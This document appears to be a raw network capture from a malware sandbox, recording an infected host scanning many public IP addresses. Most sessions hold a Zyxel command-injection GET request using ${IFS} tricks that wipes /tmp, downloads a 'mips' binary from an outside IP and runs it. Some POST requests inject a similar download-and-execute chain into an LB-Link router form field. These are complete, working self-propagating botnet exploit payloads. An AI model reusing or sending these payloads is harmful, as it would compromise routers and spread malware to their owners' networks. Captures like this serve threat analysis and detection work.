                                        Mar 31, 2024 09:20:32.249923944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1110192.168.2.2349082173.4.67.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249953985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1111192.168.2.2354724213.84.113.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250008106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1112192.168.2.2348338184.0.248.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250046968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1113192.168.2.2341874196.1.164.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250091076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1114192.168.2.235708898.159.195.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250158072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1115192.168.2.233967236.111.45.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250189066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1116192.168.2.235270632.7.26.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250217915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1117192.168.2.2334288153.246.156.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250267982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1118192.168.2.235975070.193.127.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250314951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1119192.168.2.2357884147.226.155.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250354052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1120192.168.2.2352060222.56.95.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250406027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1121192.168.2.2336608169.45.92.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.250442028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1122192.168.2.233865483.29.163.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257141113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1123192.168.2.2337768154.123.9.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257143021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1124192.168.2.2348682198.224.128.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257174969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1125192.168.2.2359746153.213.53.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257206917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1126192.168.2.233726241.68.160.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257246971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1127192.168.2.2345128178.217.35.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257283926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1128192.168.2.233835660.25.52.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257316113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1129192.168.2.2349680114.107.33.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257388115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1130192.168.2.2360442109.49.93.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257435083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1131192.168.2.2333096155.64.94.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257499933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1132192.168.2.23343562.131.52.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257541895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1133192.168.2.2355760189.89.52.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257592916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1134192.168.2.233306040.20.95.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257632971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1135192.168.2.2342528143.152.180.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257673979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1136192.168.2.2333302142.247.83.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.257734060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1137192.168.2.234773685.122.35.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.274864912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1138192.168.2.235293642.109.102.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.274930954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1139192.168.2.2359618102.149.148.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.275008917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1140192.168.2.2338950123.135.158.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.275047064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1141192.168.2.234608054.182.58.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.275248051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1142192.168.2.234272487.60.226.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.275298119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1143192.168.2.2351562119.208.90.1278080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.292455912 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:34.588197947 CEST103INHTTP/1.1 404 Not Found
                                        Content-Type: text/plain
                                        Content-Length: 30
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1144192.168.2.2356960107.148.176.1988080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:34.479384899 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:35.286842108 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:36.246877909 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:38.134495974 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:42.005886078 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:49.684844017 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:04.786695004 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:36.782211065 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1145192.168.2.2351530178.221.178.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278037071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1146192.168.2.2359266152.35.4.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278088093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1147192.168.2.234818020.175.136.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278131008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1148192.168.2.234227092.121.33.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278162956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1149192.168.2.2338150202.69.216.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278218031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1150192.168.2.2335376105.76.92.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278280973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1151192.168.2.2360432182.167.223.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:35.278476954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1152192.168.2.2357580116.244.129.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289547920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1153192.168.2.2340266191.67.133.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289601088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1154192.168.2.233907874.123.80.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289630890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1155192.168.2.2349366147.38.123.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289699078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1156192.168.2.2349652205.190.132.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289741039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1157192.168.2.235124662.106.178.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289778948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1158192.168.2.236032896.179.203.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289836884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1159192.168.2.234376493.134.170.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.289875031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1160192.168.2.236060286.255.122.193443
                                        TimestampBytes transferredDirectionData
